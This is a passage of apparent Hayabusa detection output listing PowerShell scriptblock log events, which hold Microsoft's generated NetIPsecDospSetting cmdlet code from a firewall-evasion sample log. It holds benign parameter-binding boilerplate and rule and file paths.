$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { 
[object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value 
= ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' 
-Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
